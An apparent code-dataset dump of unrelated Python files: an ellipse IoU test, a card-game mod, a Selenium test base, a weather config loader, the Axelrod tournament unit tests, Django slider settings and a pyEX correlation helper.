from diagnostics import compute_iou
def test_compute_iou():
# make up two ellipses
Y_true = (100, 140, 120, 60, 90, 0, 10.3) # ellipse a
Y_pred = (120, 123, 120, 60, 149.97, 0, 7.8) # ellipse b
#iou = evaluate_spnet.compute_iou(Y_true, Y_pred)
iou = compute_iou(Y_true, Y_pred)
np.testing.assert_equal(iou, 0.44227983107795693) # force an assertion for the test
return iou
if __name__ == '__main__':
# current setup: testing a couple pre-defined ellipses
iou = test_compute_iou()
print("IOU score = ",iou)
|
py | 1a40d8ffc6121c8f24359d9de050ec6e9b14469e | from engi_mod import *
Card(
name = "Death Ray",
# comparison to Bludgeon:
# - exhausts
# - doesn't kill attacking enemies immediately
# - overkills small enemies, requiring another source of Vulnerable to make Death Pulse free
# - bad against Artifact
# - Time Eater stacks
# + always Vulnerable
type = "skill",
target = "enemy",
rarity = "rare",
cost = 3,
const = dict(
VULNER_STACKS = 6,
PULSE_NUM = 2,
),
flags = dict(
exhaust = "true",
),
desc = "Apply 6 Vulnerable. NL Shuffle 2 Death Pulses into your draw pile. Exhaust.",
upgrade_desc = "Apply 8 Vulnerable. NL Shuffle 3 Death Pulses into your draw pile. Exhaust.",
code = """
int stacks = VULNER_STACKS;
int cards = PULSE_NUM;
if (upgraded) {
stacks += 2;
cards += 1;
}
AbstractDungeon.actionManager.addToBottom(
new ApplyPowerAction(m, p, new VulnerablePower(m, stacks, false), stacks)
);
AbstractDungeon.actionManager.addToBottom(
new MakeTempCardInDrawPileAction(p, p, new DeathPulse(), cards, true, true)
);
""",
upgrade_code = """
upgradeName();
rawDescription = UPGRADE_DESCRIPTION;
initializeDescription();
"""
)
Card(
name = "Death Pulse",
type = "attack",
target = "enemy",
rarity = "special",
cost = 2,
const = dict(
DAMAGE = 14,
DAMAGE_UPGRADE = 6,
),
flags = dict(
exhaust = "true",
),
desc = "Deal !D! damage. If the target is Vulnerable, gain [R] [R] and draw 1 card. Exhaust.",
code = """
AbstractDungeon.actionManager.addToBottom(
new DeathPulseAction(m)
);
AbstractDungeon.actionManager.addToBottom(
new DamageAction(m, new DamageInfo(p, damage, damageTypeForTurn), AbstractGameAction.AttackEffect.BLUNT_HEAVY)
);
""",
upgrade_code_FULL = """
upgradeName();
upgradeDamage(DAMAGE_UPGRADE);
"""
)
Action(
id = "DeathPulseAction",
args = """
AbstractCreature target
""",
flags = dict(
duration = "Settings.ACTION_DUR_XFAST",
actionType = "ActionType.BLOCK",
),
code = """
if (target != null && target.hasPower("Vulnerable")) {
AbstractDungeon.actionManager.addToTop(new DrawCardAction(AbstractDungeon.player, 1));
AbstractDungeon.actionManager.addToTop(new GainEnergyAction(2));
}
isDone = true;
""",
)
|
py | 1a40d939d502195e456e52a339c85a55cfceb9d5 | import logging
import os
import unittest
home_dir = os.getenv('HOME')
logging.basicConfig(level = logging.DEBUG)
from selenium import webdriver
class BrowserTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
p = webdriver.FirefoxProfile()
p.set_preference('webdriver.log.file', home_dir + '/firefox_console')
cls.browser = webdriver.Firefox(p)
cls.browser.implicitly_wait(30)
@classmethod
def tearDownClass(cls):
cls.browser.quit()
def setUp(self):
"""Start a new browser session, and schedule the browser to be shutdown"""
self.browser = self.__class__.browser
self.browser.delete_all_cookies()
def elem(self, selector):
"""Alias for self.browser.find_element_by_css_selector"""
return self.browser.find_element_by_css_selector(selector)
def elems(self, selector):
"""Alias for self.browser.find_elements_by_css_selector"""
return self.browser.find_elements_by_css_selector(selector)
def findLink(self, name):
"""Alias for self.browser.find_element_by_link_text"""
return self.browser.find_element_by_link_text(name)
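# Minimal usage sketch (illustrative; the test class, URL and selector below
# are assumptions, not part of this module). A concrete test inherits the
# shared Firefox session and the elem/elems/findLink helpers:
#
#   class ExampleHomepageTest(BrowserTestCase):
#       def test_heading_present(self):
#           self.browser.get("http://localhost:8000/")  # hypothetical URL
#           heading = self.elem("h1")
#           self.assertTrue(heading.text)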
|
py | 1a40d9427c5a2d0bb22a328e2999cbd85b27b377 | from PIL.Image import Image
def noop(image: Image) -> Image:
"""
Dummy processor.
It does nothing and returns the same image.
:param image: input image
:return: same image
"""
return image
|
py | 1a40d94ccce67a66a2bb8c60f252799bea464823 | from app.helpers.cache import CacheExpiresAfter
from app.helpers.units import Units
from configparser import ConfigParser
config = ConfigParser()
config.read('config.ini')
def handle_cache_expires_after():
try:
if CacheExpiresAfter(config["cache"]["cache_expires_after"]) is CacheExpiresAfter.DISABLE:
return CacheExpiresAfter.DISABLE
if CacheExpiresAfter(config["cache"]["cache_expires_after"]) is CacheExpiresAfter.TODAY:
return CacheExpiresAfter.TODAY
except:
return int(config["cache"]["cache_expires_after"])
class BaseConfigError(Exception):
pass
class BaseConfig:
OPEN_WEATHER_MAP_API_KEY = config["api"]["open_weather_map_key"]
LATITUDE = config["general"]["latitude"]
LONGITUDE = config["general"]["longitude"]
CACHE_EXPIRES_AFTER = handle_cache_expires_after()
DEFAULT_BASE_UNITS = Units.METRIC
BASE_UNITS = DEFAULT_BASE_UNITS if config["general"]["base_units"] is None else Units(
config["general"]["base_units"])
DEFAULT_LANGUAGE = "en"
LANGUAGE = DEFAULT_LANGUAGE if config["general"]["language"] is None else config["general"]["language"]
MEMCACHED_SERVER = config["cache"]["memcached"]
if BaseConfig.OPEN_WEATHER_MAP_API_KEY is None:
raise BaseConfigError("OPEN_WEATHER_MAP_API_KEY is missing")
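# Illustrative config.ini layout implied by the keys read above (section and
# option names come from this module; all values are placeholders, and the
# exact strings accepted for base_units/cache_expires_after depend on the
# Units and CacheExpiresAfter enums):
#
#   [api]
#   open_weather_map_key = <your-api-key>
#
#   [general]
#   latitude = 52.52
#   longitude = 13.40
#   base_units = metric
#   language = en
#
#   [cache]
#   cache_expires_after = today
#   memcached = 127.0.0.1:11211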
|
py | 1a40da703cf53178c6c31a759bb4f1508f0dafaa | """Tests for the main tournament class."""
import csv
import logging
from multiprocessing import Queue, cpu_count
import unittest
import warnings
from hypothesis import given, example, settings
from hypothesis.strategies import integers, floats
from axelrod.tests.property import (tournaments,
prob_end_tournaments,
spatial_tournaments,
strategy_lists)
import axelrod
try:
# Python 3
from unittest.mock import MagicMock
except ImportError:
# Python 2
from mock import MagicMock
test_strategies = [axelrod.Cooperator,
axelrod.TitForTat,
axelrod.Defector,
axelrod.Grudger,
axelrod.GoByMajority]
test_repetitions = 5
test_turns = 100
test_prob_end = .5
test_edges = [(0, 1), (1, 2), (3, 4)]
deterministic_strategies = [s for s in axelrod.strategies
if not s().classifier['stochastic']]
class TestTournament(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.game = axelrod.Game()
cls.players = [s() for s in test_strategies]
cls.test_name = 'test'
cls.test_repetitions = test_repetitions
cls.test_turns = test_turns
cls.expected_payoff = [
[600, 600, 0, 600, 600],
[600, 600, 199, 600, 600],
[1000, 204, 200, 204, 204],
[600, 600, 199, 600, 600],
[600, 600, 199, 600, 600]]
cls.expected_cooperation = [
[200, 200, 200, 200, 200],
[200, 200, 1, 200, 200],
[0, 0, 0, 0, 0],
[200, 200, 1, 200, 200],
[200, 200, 1, 200, 200]]
cls.filename = "test_outputs/test_tournament.csv"
def test_init(self):
tournament = axelrod.Tournament(
name=self.test_name,
players=self.players,
game=self.game,
turns=self.test_turns,
noise=0.2)
self.assertEqual(len(tournament.players), len(test_strategies))
self.assertIsInstance(
tournament.players[0].match_attributes['game'], axelrod.Game
)
self.assertEqual(tournament.game.score(('C', 'C')), (3, 3))
self.assertEqual(tournament.turns, self.test_turns)
self.assertEqual(tournament.repetitions, 10)
self.assertEqual(tournament.name, 'test')
self.assertTrue(tournament._with_morality)
self.assertIsInstance(tournament._logger, logging.Logger)
self.assertEqual(tournament.noise, 0.2)
anonymous_tournament = axelrod.Tournament(players=self.players)
self.assertEqual(anonymous_tournament.name, 'axelrod')
def test_warning(self):
tournament = axelrod.Tournament(
name=self.test_name,
players=self.players,
game=self.game,
turns=10,
repetitions=1)
with warnings.catch_warnings(record=True) as w:
# Check that a warning is raised if no results set is built and no
# filename given
results = tournament.play(build_results=False, progress_bar=False)
self.assertEqual(len(w), 1)
with warnings.catch_warnings(record=True) as w:
# Check that no warning is raised if no results set is built and a
# is filename given
tournament.play(build_results=False,
filename=self.filename, progress_bar=False)
self.assertEqual(len(w), 0)
def test_serial_play(self):
# Test that we get an instance of ResultSet
tournament = axelrod.Tournament(
name=self.test_name,
players=self.players,
game=self.game,
turns=200,
repetitions=self.test_repetitions)
results = tournament.play(progress_bar=False)
self.assertIsInstance(results, axelrod.ResultSet)
# Test that _run_serial_repetitions is called with empty matches list
tournament = axelrod.Tournament(
name=self.test_name,
players=self.players,
game=self.game,
turns=200,
repetitions=self.test_repetitions)
results = tournament.play(progress_bar=False)
self.assertEqual(tournament.num_interactions, 75)
def test_serial_play_with_different_game(self):
# Test that a non default game is passed to the result set
game = axelrod.Game(p=-1, r=-1, s=-1, t=-1)
tournament = axelrod.Tournament(
name=self.test_name,
players=self.players,
game=game,
turns=1,
repetitions=1)
results = tournament.play(progress_bar=False)
self.assertEqual(results.game.RPST(), (-1, -1, -1, -1))
def test_no_progress_bar_play(self):
"""Test that progress bar is not created for progress_bar=False"""
tournament = axelrod.Tournament(
name=self.test_name,
players=self.players,
game=self.game,
turns=200,
repetitions=self.test_repetitions)
# Test with build results
results = tournament.play(progress_bar=False)
self.assertIsInstance(results, axelrod.ResultSet)
# Check that no progress bar was created
call_progress_bar = lambda: tournament.progress_bar.total
self.assertRaises(AttributeError, call_progress_bar)
# Test without build results
results = tournament.play(progress_bar=False, build_results=False,
filename=self.filename)
self.assertIsNone(results)
results = axelrod.ResultSetFromFile(self.filename)
self.assertIsInstance(results, axelrod.ResultSet)
self.assertRaises(AttributeError, call_progress_bar)
def test_progress_bar_play(self):
"""Test that progress bar is created by default and with True argument"""
tournament = axelrod.Tournament(
name=self.test_name,
players=self.players,
game=self.game,
turns=200,
repetitions=self.test_repetitions)
results = tournament.play()
self.assertIsInstance(results, axelrod.ResultSet)
self.assertEqual(tournament.progress_bar.total, 15)
results = tournament.play(progress_bar=True)
self.assertIsInstance(results, axelrod.ResultSet)
self.assertEqual(tournament.progress_bar.total, 15)
# Test without build results
results = tournament.play(progress_bar=True, build_results=False,
filename=self.filename)
self.assertIsNone(results)
results = axelrod.ResultSetFromFile(self.filename)
self.assertIsInstance(results, axelrod.ResultSet)
self.assertEqual(tournament.progress_bar.total, 15)
@unittest.skipIf(axelrod.on_windows,
"Parallel processing not supported on Windows")
def test_progress_bar_play_parallel(self):
"""Test that tournament plays when asking for progress bar for parallel
tournament"""
tournament = axelrod.Tournament(
name=self.test_name,
players=self.players,
game=self.game,
turns=200,
repetitions=self.test_repetitions)
results = tournament.play(processes=2)
self.assertIsInstance(results, axelrod.ResultSet)
results = tournament.play(progress_bar=True)
self.assertIsInstance(results, axelrod.ResultSet)
@given(tournament=tournaments(min_size=2, max_size=5, min_turns=2,
max_turns=50, min_repetitions=2,
max_repetitions=4))
@settings(max_examples=50, timeout=0)
@example(tournament=axelrod.Tournament(players=[s() for s in
test_strategies], turns=test_turns, repetitions=test_repetitions)
)
# These two examples are to make sure #465 is fixed.
# As explained there: https://github.com/Axelrod-Python/Axelrod/issues/465,
# these two examples were identified by hypothesis.
@example(tournament=
axelrod.Tournament(players=[axelrod.BackStabber(),
axelrod.MindReader()],
turns=2, repetitions=1),
)
@example(tournament=
axelrod.Tournament(players=[axelrod.BackStabber(),
axelrod.ThueMorse()],
turns=2, repetitions=1),
)
def test_property_serial_play(self, tournament):
"""Test serial play using hypothesis"""
# Test that we get an instance of ResultSet
results = tournament.play(progress_bar=False)
self.assertIsInstance(results, axelrod.ResultSet)
self.assertEqual(results.nplayers, len(tournament.players))
self.assertEqual(results.players, [str(p) for p in tournament.players])
@unittest.skipIf(axelrod.on_windows,
"Parallel processing not supported on Windows")
def test_parallel_play(self):
# Test that we get an instance of ResultSet
tournament = axelrod.Tournament(
name=self.test_name,
players=self.players,
game=self.game,
turns=200,
repetitions=self.test_repetitions)
results = tournament.play(processes=2, progress_bar=False)
self.assertIsInstance(results, axelrod.ResultSet)
self.assertEqual(tournament.num_interactions, 75)
# The following relates to #516
players = [axelrod.Cooperator(), axelrod.Defector(),
axelrod.BackStabber(), axelrod.PSOGambler(),
axelrod.ThueMorse(), axelrod.DoubleCrosser()]
tournament = axelrod.Tournament(
name=self.test_name,
players=players,
game=self.game,
turns=20,
repetitions=self.test_repetitions)
scores = tournament.play(processes=2, progress_bar=False).scores
self.assertEqual(len(scores), len(players))
def test_run_serial(self):
tournament = axelrod.Tournament(
name=self.test_name,
players=self.players,
game=self.game,
turns=200,
repetitions=self.test_repetitions)
tournament._write_interactions = MagicMock(
name='_write_interactions')
self.assertTrue(tournament._run_serial())
# Get the calls made to write_interactions
calls = tournament._write_interactions.call_args_list
self.assertEqual(len(calls), 15)
@unittest.skipIf(axelrod.on_windows,
"Parallel processing not supported on Windows")
def test_run_parallel(self):
tournament = axelrod.Tournament(
name=self.test_name,
players=self.players,
game=self.game,
turns=200,
repetitions=self.test_repetitions)
tournament._write_interactions = MagicMock(
name='_write_interactions')
self.assertTrue(tournament._run_parallel())
# Get the calls made to write_interactions
calls = tournament._write_interactions.call_args_list
self.assertEqual(len(calls), 15)
@unittest.skipIf(axelrod.on_windows,
"Parallel processing not supported on Windows")
def test_n_workers(self):
max_processes = cpu_count()
tournament = axelrod.Tournament(
name=self.test_name,
players=self.players,
game=self.game,
turns=200,
repetitions=self.test_repetitions)
self.assertEqual(tournament._n_workers(processes=1), max_processes)
tournament = axelrod.Tournament(
name=self.test_name,
players=self.players,
game=self.game,
turns=200,
repetitions=self.test_repetitions)
self.assertEqual(tournament._n_workers(processes=max_processes+2),
max_processes)
@unittest.skipIf(axelrod.on_windows,
"Parallel processing not supported on Windows")
@unittest.skipIf(
cpu_count() < 2,
"not supported on single processor machines")
def test_2_workers(self):
# This is a separate test with a skip condition because we
# cannot guarantee that the tests will always run on a machine
# with more than one processor
tournament = axelrod.Tournament(
name=self.test_name,
players=self.players,
game=self.game,
turns=200,
repetitions=self.test_repetitions,)
self.assertEqual(tournament._n_workers(processes=2), 2)
@unittest.skipIf(axelrod.on_windows,
"Parallel processing not supported on Windows")
def test_start_workers(self):
workers = 2
work_queue = Queue()
done_queue = Queue()
tournament = axelrod.Tournament(
name=self.test_name,
players=self.players,
game=self.game,
turns=200,
repetitions=self.test_repetitions)
chunks = tournament.match_generator.build_match_chunks()
for chunk in chunks:
work_queue.put(chunk)
tournament._start_workers(workers, work_queue, done_queue)
stops = 0
while stops < workers:
payoffs = done_queue.get()
if payoffs == 'STOP':
stops += 1
self.assertEqual(stops, workers)
@unittest.skipIf(axelrod.on_windows,
"Parallel processing not supported on Windows")
def test_worker(self):
tournament = axelrod.Tournament(
name=self.test_name,
players=self.players,
game=self.game,
turns=200,
repetitions=self.test_repetitions)
work_queue = Queue()
chunks = tournament.match_generator.build_match_chunks()
count = 0
for chunk in chunks:
work_queue.put(chunk)
count += 1
work_queue.put('STOP')
done_queue = Queue()
tournament._worker(work_queue, done_queue)
for r in range(count):
new_matches = done_queue.get()
for index_pair, matches in new_matches.items():
self.assertIsInstance(index_pair, tuple)
self.assertEqual(len(matches), self.test_repetitions)
queue_stop = done_queue.get()
self.assertEqual(queue_stop, 'STOP')
def test_build_result_set(self):
tournament = axelrod.Tournament(
name=self.test_name,
players=self.players,
game=self.game,
turns=200,
repetitions=self.test_repetitions)
results = tournament.play(progress_bar=False)
self.assertIsInstance(results, axelrod.ResultSet)
# Test in memory
results = tournament.play(progress_bar=False, in_memory=True)
self.assertIsInstance(results, axelrod.ResultSet)
def test_no_build_result_set(self):
tournament = axelrod.Tournament(
name=self.test_name,
players=self.players,
game=self.game,
turns=200,
repetitions=self.test_repetitions)
results = tournament.play(build_results=False, filename=self.filename,
progress_bar=False)
self.assertIsNone(results)
# Checking that results were written properly
results = axelrod.ResultSetFromFile(self.filename)
self.assertIsInstance(results, axelrod.ResultSet)
@given(turns=integers(min_value=1, max_value=200))
@example(turns=3)
@example(turns=200)
def test_play_matches(self, turns):
tournament = axelrod.Tournament(
name=self.test_name,
players=self.players,
game=self.game,
repetitions=self.test_repetitions)
def make_chunk_generator():
for player1_index in range(len(self.players)):
for player2_index in range(player1_index, len(self.players)):
index_pair = (player1_index, player2_index)
match_params = (turns, self.game, None, 0)
yield (index_pair, match_params, self.test_repetitions)
chunk_generator = make_chunk_generator()
interactions = {}
for chunk in chunk_generator:
result = tournament._play_matches(chunk)
for index_pair, inters in result.items():
try:
interactions[index_pair].append(inters)
except KeyError:
interactions[index_pair] = [inters]
self.assertEqual(len(interactions), 15)
for index_pair, inter in interactions.items():
self.assertEqual(len(index_pair), 2)
for plays in inter:
                # Check that we have the expected number of repetitions
self.assertEqual(len(plays), self.test_repetitions)
for repetition in plays:
                    # Check that each repetition has the correct length
self.assertEqual(len(repetition), turns)
        # Check that the chunk generator is now exhausted
self.assertEqual((len(list(chunk_generator))), 0)
def test_write_interactions(self):
tournament = axelrod.Tournament(
name=self.test_name,
players=self.players,
game=self.game,
turns=2,
repetitions=2)
tournament._write_interactions = MagicMock(
name='_write_interactions')
tournament._build_result_set = MagicMock(
name='_build_result_set') # Mocking this as it is called by play
self.assertTrue(tournament.play(filename=self.filename,
progress_bar=False))
tournament.outputfile.close() # This is normally closed by `build_result_set`
# Get the calls made to write_interactions
calls = tournament._write_interactions.call_args_list
self.assertEqual(len(calls), 15)
        # Test when running in memory
tournament._write_interactions = MagicMock(
name='_write_interactions')
self.assertTrue(tournament.play(filename=self.filename,
progress_bar=False,
in_memory=True))
# Get the calls made to write_interactions
calls = tournament._write_interactions.call_args_list
self.assertEqual(len(calls), 15)
def test_write_to_csv(self):
tournament = axelrod.Tournament(
name=self.test_name,
players=self.players,
game=self.game,
turns=2,
repetitions=2)
tournament.play(filename=self.filename, progress_bar=False)
with open(self.filename, 'r') as f:
written_data = [[int(r[0]), int(r[1])] + r[2:] for r in csv.reader(f)]
expected_data = [[0, 1, 'Cooperator', 'Tit For Tat', 'CC', 'CC'],
[0, 1, 'Cooperator', 'Tit For Tat', 'CC', 'CC'],
[1, 2, 'Tit For Tat', 'Defector', 'CD', 'DD'],
[1, 2, 'Tit For Tat', 'Defector', 'CD', 'DD'],
[0, 0, 'Cooperator', 'Cooperator', 'CC', 'CC'],
[0, 0, 'Cooperator', 'Cooperator', 'CC', 'CC'],
[3, 3, 'Grudger', 'Grudger', 'CC', 'CC'],
[3, 3, 'Grudger', 'Grudger', 'CC', 'CC'],
[2, 2, 'Defector', 'Defector', 'DD', 'DD'],
[2, 2, 'Defector', 'Defector', 'DD', 'DD'],
[4, 4, 'Soft Go By Majority', 'Soft Go By Majority', 'CC', 'CC'],
[4, 4, 'Soft Go By Majority', 'Soft Go By Majority', 'CC', 'CC'],
[1, 4, 'Tit For Tat', 'Soft Go By Majority', 'CC', 'CC'],
[1, 4, 'Tit For Tat', 'Soft Go By Majority', 'CC', 'CC'],
[1, 1, 'Tit For Tat', 'Tit For Tat', 'CC', 'CC'],
[1, 1, 'Tit For Tat', 'Tit For Tat', 'CC', 'CC'],
[1, 3, 'Tit For Tat', 'Grudger', 'CC', 'CC'],
[1, 3, 'Tit For Tat', 'Grudger', 'CC', 'CC'],
[2, 3, 'Defector', 'Grudger', 'DD', 'CD'],
[2, 3, 'Defector', 'Grudger', 'DD', 'CD'],
[0, 4, 'Cooperator', 'Soft Go By Majority', 'CC', 'CC'],
[0, 4, 'Cooperator', 'Soft Go By Majority', 'CC', 'CC'],
[2, 4, 'Defector', 'Soft Go By Majority', 'DD', 'CD'],
[2, 4, 'Defector', 'Soft Go By Majority', 'DD', 'CD'],
[0, 3, 'Cooperator', 'Grudger', 'CC', 'CC'],
[0, 3, 'Cooperator', 'Grudger', 'CC', 'CC'],
[3, 4, 'Grudger', 'Soft Go By Majority', 'CC', 'CC'],
[3, 4, 'Grudger', 'Soft Go By Majority', 'CC', 'CC'],
[0, 2, 'Cooperator', 'Defector', 'CC', 'DD'],
[0, 2, 'Cooperator', 'Defector', 'CC', 'DD']]
self.assertEqual(sorted(written_data), sorted(expected_data))
class TestProbEndTournament(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.game = axelrod.Game()
cls.players = [s() for s in test_strategies]
cls.test_name = 'test'
cls.test_repetitions = test_repetitions
cls.test_prob_end = test_prob_end
def test_init(self):
tournament = axelrod.ProbEndTournament(
name=self.test_name,
players=self.players,
game=self.game,
prob_end=self.test_prob_end,
noise=0.2)
self.assertEqual(tournament.match_generator.prob_end, tournament.prob_end)
self.assertEqual(len(tournament.players), len(test_strategies))
self.assertEqual(tournament.game.score(('C', 'C')), (3, 3))
self.assertEqual(tournament.turns, float("inf"))
self.assertEqual(tournament.repetitions, 10)
self.assertEqual(tournament.name, 'test')
self.assertTrue(tournament._with_morality)
self.assertIsInstance(tournament._logger, logging.Logger)
self.assertEqual(tournament.noise, 0.2)
anonymous_tournament = axelrod.Tournament(players=self.players)
self.assertEqual(anonymous_tournament.name, 'axelrod')
@given(tournament=prob_end_tournaments(min_size=2, max_size=5,
min_prob_end=.1,
max_prob_end=.9,
min_repetitions=2,
max_repetitions=4))
@settings(max_examples=50, timeout=0)
@example(tournament=
axelrod.ProbEndTournament(players=[s() for s in test_strategies],
prob_end=.2, repetitions=test_repetitions)
)
# These two examples are to make sure #465 is fixed.
# As explained there: https://github.com/Axelrod-Python/Axelrod/issues/465,
# these two examples were identified by hypothesis.
@example(tournament=
axelrod.ProbEndTournament(players=[axelrod.BackStabber(),
axelrod.MindReader()],
prob_end=.2, repetitions=1))
@example(tournament=
axelrod.ProbEndTournament(players=[axelrod.ThueMorse(),
axelrod.MindReader()],
prob_end=.2, repetitions=1))
def test_property_serial_play(self, tournament):
"""Test serial play using hypothesis"""
# Test that we get an instance of ResultSet
results = tournament.play(progress_bar=False)
self.assertIsInstance(results, axelrod.ResultSet)
self.assertEqual(results.nplayers, len(tournament.players))
self.assertEqual(results.players, [str(p) for p in tournament.players])
class TestSpatialTournament(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.game = axelrod.Game()
cls.players = [s() for s in test_strategies]
cls.test_name = 'test'
cls.test_repetitions = test_repetitions
cls.test_turns = test_turns
cls.test_edges = test_edges
def test_init(self):
tournament = axelrod.SpatialTournament(
name=self.test_name,
players=self.players,
game=self.game,
turns=self.test_turns,
edges=self.test_edges,
noise=0.2)
self.assertEqual(tournament.match_generator.edges, tournament.edges)
self.assertEqual(len(tournament.players), len(test_strategies))
self.assertEqual(tournament.game.score(('C', 'C')), (3, 3))
self.assertEqual(tournament.turns, 100)
self.assertEqual(tournament.repetitions, 10)
self.assertEqual(tournament.name, 'test')
self.assertTrue(tournament._with_morality)
self.assertIsInstance(tournament._logger, logging.Logger)
self.assertEqual(tournament.noise, 0.2)
self.assertEqual(tournament.match_generator.noise, 0.2)
anonymous_tournament = axelrod.Tournament(players=self.players)
self.assertEqual(anonymous_tournament.name, 'axelrod')
@given(strategies=strategy_lists(strategies=deterministic_strategies,
min_size=2, max_size=2),
turns=integers(min_value=1, max_value=20),
repetitions=integers(min_value=1, max_value=5),
noise=floats(min_value=0, max_value=1),
seed=integers(min_value=0, max_value=4294967295))
@settings(max_examples=50, timeout=0)
def test_complete_tournament(self, strategies, turns, repetitions,
noise, seed):
"""
A test to check that a spatial tournament on the complete multigraph
gives the same results as the round robin.
"""
players = [s() for s in strategies]
# edges
edges = []
for i in range(0, len(players)):
for j in range(i, len(players)):
edges.append((i, j))
# create a round robin tournament
tournament = axelrod.Tournament(players, repetitions=repetitions,
turns=turns, noise=noise)
# create a complete spatial tournament
spatial_tournament = axelrod.SpatialTournament(players,
repetitions=repetitions,
turns=turns,
noise=noise,
edges=edges)
axelrod.seed(seed)
results = tournament.play(progress_bar=False)
axelrod.seed(seed)
spatial_results = spatial_tournament.play(progress_bar=False)
self.assertEqual(results.ranked_names, spatial_results.ranked_names)
self.assertEqual(results.nplayers, spatial_results.nplayers)
self.assertEqual(results.nrepetitions, spatial_results.nrepetitions)
self.assertEqual(results.payoff_diffs_means,
spatial_results.payoff_diffs_means)
self.assertEqual(results.payoff_matrix, spatial_results.payoff_matrix)
self.assertEqual(results.payoff_stddevs, spatial_results.payoff_stddevs)
self.assertEqual(results.payoffs, spatial_results.payoffs)
self.assertEqual(results.cooperating_rating,
spatial_results.cooperating_rating)
self.assertEqual(results.cooperation, spatial_results.cooperation)
self.assertEqual(results.normalised_cooperation,
spatial_results.normalised_cooperation)
self.assertEqual(results.normalised_scores,
spatial_results.normalised_scores)
self.assertEqual(results.good_partner_matrix,
spatial_results.good_partner_matrix)
self.assertEqual(results.good_partner_rating,
spatial_results.good_partner_rating)
def test_particular_tournament(self):
"""A test for a tournament that has caused failures during some bug
fixing"""
players = [axelrod.Cooperator(), axelrod.Defector(),
axelrod.TitForTat(), axelrod.Grudger()]
edges = [(0, 2), (0, 3), (1, 2), (1, 3)]
tournament = axelrod.SpatialTournament(players, edges=edges)
results = tournament.play(progress_bar=False)
expected_ranked_names = ['Cooperator', 'Tit For Tat',
'Grudger', 'Defector']
self.assertEqual(results.ranked_names, expected_ranked_names)
# Check that this tournament runs with noise
tournament = axelrod.SpatialTournament(players, edges=edges, noise=.5)
results = tournament.play(progress_bar=False)
self.assertIsInstance(results, axelrod.ResultSet)
class TestProbEndingSpatialTournament(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.game = axelrod.Game()
cls.players = [s() for s in test_strategies]
cls.test_name = 'test'
cls.test_repetitions = test_repetitions
cls.test_prob_end = test_prob_end
cls.test_edges = test_edges
def test_init(self):
tournament = axelrod.ProbEndSpatialTournament(
name=self.test_name,
players=self.players,
game=self.game,
prob_end=self.test_prob_end,
edges=self.test_edges,
noise=0.2)
self.assertEqual(tournament.match_generator.edges, tournament.edges)
self.assertEqual(len(tournament.players), len(test_strategies))
self.assertEqual(tournament.game.score(('C', 'C')), (3, 3))
self.assertEqual(tournament.turns, float("inf"))
self.assertEqual(tournament.repetitions, 10)
self.assertEqual(tournament.name, 'test')
self.assertTrue(tournament._with_morality)
self.assertIsInstance(tournament._logger, logging.Logger)
self.assertEqual(tournament.noise, 0.2)
self.assertEqual(tournament.match_generator.noise, 0.2)
self.assertEqual(tournament.prob_end, self.test_prob_end)
anonymous_tournament = axelrod.Tournament(players=self.players)
self.assertEqual(anonymous_tournament.name, 'axelrod')
@given(strategies=strategy_lists(strategies=deterministic_strategies,
min_size=2, max_size=2),
prob_end=floats(min_value=.1, max_value=.9),
reps=integers(min_value=1, max_value=3),
seed=integers(min_value=0, max_value=4294967295))
@settings(max_examples=50, timeout=0)
def test_complete_tournament(self, strategies, prob_end,
seed, reps):
"""
A test to check that a spatial tournament on the complete graph
gives the same results as the round robin.
"""
players = [s() for s in strategies]
# edges
edges = [(i, j) for i in range(len(players))
for j in range(i, len(players))]
# create a prob end round robin tournament
axelrod.seed(seed)
tournament = axelrod.ProbEndTournament(players, prob_end=prob_end,
repetitions=reps)
results = tournament.play(progress_bar=False)
# create a complete spatial tournament
axelrod.seed(seed)
spatial_tournament = axelrod.ProbEndSpatialTournament(players,
prob_end=prob_end,
repetitions=reps,
edges=edges)
spatial_results = spatial_tournament.play(progress_bar=False)
self.assertEqual(results.match_lengths, spatial_results.match_lengths)
self.assertEqual(results.ranked_names, spatial_results.ranked_names)
self.assertEqual(results.wins, spatial_results.wins)
self.assertEqual(results.scores, spatial_results.scores)
self.assertEqual(results.cooperation,
spatial_results.cooperation)
@given(tournament=spatial_tournaments(strategies=axelrod.basic_strategies,
max_turns=1, max_noise=0,
max_repetitions=3),
seed=integers(min_value=0, max_value=4294967295))
@settings(max_examples=50, timeout=0)
def test_one_turn_tournament(self, tournament, seed):
"""
        Tests that a probabilistic-ending spatial tournament with prob_end=1
        gives the same results as the corresponding one-turn spatial tournament
"""
prob_end_tour = axelrod.ProbEndSpatialTournament(tournament.players,
prob_end=1,
edges=tournament.edges,
repetitions=tournament.repetitions)
axelrod.seed(seed)
prob_end_results = prob_end_tour.play(progress_bar=False)
axelrod.seed(seed)
one_turn_results = tournament.play(progress_bar=False)
self.assertEqual(prob_end_results.scores,
one_turn_results.scores)
self.assertEqual(prob_end_results.wins,
one_turn_results.wins)
self.assertEqual(prob_end_results.cooperation,
one_turn_results.cooperation)
|
py | 1a40da9d2ec09d98598ec535035483d918ba42e0 | from django.conf import settings
static_url = getattr(settings, 'STATIC_URL', '/static/')
app_settings = getattr(settings, 'COMPLETE_SLIDER', {})
if 'JS_URL' not in app_settings:
app_settings['JS_URL'] = static_url + 'djangocms_complete_slider/js/vegas.js'
if 'CSS_URL' not in app_settings:
app_settings['CSS_URL'] = static_url + 'djangocms_complete_slider/css/vegas.min.css'
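# A hypothetical override in a project's settings.py (illustrative only, not
# part of the original module). Any key omitted from COMPLETE_SLIDER falls
# back to the STATIC_URL-based default computed above.
#
# COMPLETE_SLIDER = {
#     'JS_URL': '/assets/vendor/vegas.js',
#     'CSS_URL': '/assets/vendor/vegas.min.css',
# }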
|
py | 1a40dc49ffb962ed6704948505ea85dcf9ecad67 | # *****************************************************************************
#
# Copyright (c) 2020, the pyEX authors.
#
# This file is part of the pyEX library, distributed under the terms of
# the Apache License 2.0. The full license can be found in the LICENSE file.
#
def peerCorrelation(client, symbol, range="6m"):
"""This will return a dataframe of peer correlations for the given symbol across
the given range
Args:
client (pyEX.Client): Client
symbol (string): Ticker
range (string): range to use, for pyEX.chart
Returns:
DataFrame: result
"""
peers = client.peers(symbol)
rets = client.batchDF(peers + [symbol], "chart", range)["chart"]
ret = rets.pivot(columns="symbol", values="changePercent").corr()
ret.index.name = "symbol"
